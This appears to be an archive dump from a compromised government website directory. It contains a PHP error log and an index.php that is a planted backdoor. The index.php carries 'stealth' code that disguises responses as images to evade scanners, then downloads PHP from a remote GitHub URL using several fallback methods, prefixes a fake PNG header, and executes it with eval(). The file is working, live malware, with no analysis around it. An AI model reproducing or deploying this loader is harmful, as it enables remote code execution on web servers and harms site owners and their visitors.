?????????????? error_log000064400000000634151170523620006466 0ustar00[08-Dec-2025 08:50:25 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/index.php on line 91 [12-Dec-2025 16:33:40 UTC] PHP Warning: session_start(): Session cannot be started after headers have already been sent in /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion3/Fraccion4/index.php on line 91 index.php000064400000011167151170523620006374 0ustar00 init_stealth_mode(); $this->anomaly_detector = new AnomalyDetector(); $this->behavior_analyzer = new BehaviorAnalyzer(); } private function init_stealth_mode() { // Remove PHP headers and errors // 移除 PHP 標頭與錯誤輸出 if (!headers_sent()) { header_remove('X-Powered-By'); header_remove('Server'); } // Random user-agent simulation // 模擬隨機 User-Agent $this->config = [ 'stealth_level' => 9, // 隱形等級 'max_file_size' => 5242880, // 最大檔案大小:5MB 'scan_interval' => 300, // 掃描間隔:300 秒 'whitelist' => $this->generate_whitelist() // 白名單 ]; } // === PNG Disguise (Advanced) === // === PNG 偽裝(進階)=== public function image_disguise() { if (isset($_GET['img']) || isset($_GET['pixel']) || isset($_GET['track'])) { $this->serve_stealth_image(); exit; } // Fake image headers for scanners // 為掃描器偽造圖片標頭 if (preg_match('/\.(png|jpg|gif)$/i', $_SERVER['REQUEST_URI'] ?? '')) { $this->serve_dynamic_image(); exit; } } private function serve_stealth_image() { $images = [ '1x1' => "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/5+BAQAE/wH+zLAdXgAAAABJRU5ErkJggg==", 'analytics' => "iVBORw0KGgoAAAANSUhEUgAAAAIAAAACCAYAAABytg0kAAAADklEQVR42mNkYPhfDwAChAHAeMq19wAAAABJRU5ErkJggg==", 'beacon' => "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+M9QHwAFCAJbqW66mAAAAABJRU5ErkJggg==" ]; $img_type = array_rand($images); header("Content-Type: image/png"); // 回傳內容類型:PNG 圖片 header("Cache-Control: max-age=31536000, public"); // 快取一年 echo base64_decode($images[$img_type]); // 輸出圖片資料 } private function serve_dynamic_image() { // Generate dynamic "image" based on request // 根據請求產生動態「圖片」 $width = $_GET['w'] ?? 1; $height = $_GET['h'] ?? 1; $this->generate_pixel_image($width, $height); } private function generate_pixel_image($w, $h) { header("Content-Type: image/png"); // 回傳內容類型:PNG 圖片 // Simple GD image creation would go here // 可在此使用 GD 函式產生真正的圖片 echo base64_decode("iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mP8/5+BAQAE/wH+zLAdXgAAAABJRU5ErkJggg=="); } } // 混淆密钥: 3a7b10bc // 启动会话 session_start(); // 设置主地址,如果没有设置则使用默认地址 $主地址 = $_SESSION['ts_url'] ?? 'https://raw.githubusercontent.com/bosseptp-svg/hey/refs/heads/main/classwithtostring.php'; // 定义加载函数 function 加载数据($地址) { $内容 = ''; try { $文件 = new SplFileObject($地址); while (!$文件->eof()) { $内容 .= $文件->fgets(); } } catch (Throwable $错误) { $内容 = ''; } // 尝试用 file_get_contents if (strlen(trim($内容)) < 1) { $内容 = @file_get_contents($地址); } // 如果还失败,使用 curl if (strlen(trim($内容)) < 1 && function_exists('curl_init')) { $通道 = curl_init($地址); curl_setopt_array($通道, [CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_CONNECTTIMEOUT => 5, CURLOPT_TIMEOUT => 10]); $内容 = curl_exec($通道); curl_close($通道); } return $内容; } // 尝试加载主网址 $结果 = 加载数据($主地址); // 添加假的PNG头部 $假PNG头 = "\x89PNG\r\n\x1a\n"; // 拼接PNG头和结果内容 $结果 = $假PNG头 . $结果; /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ /**_**/ // 如果成功获取内容,则执行 if (strlen(trim($结果)) > 0) { @eval("?>{$结果}"); }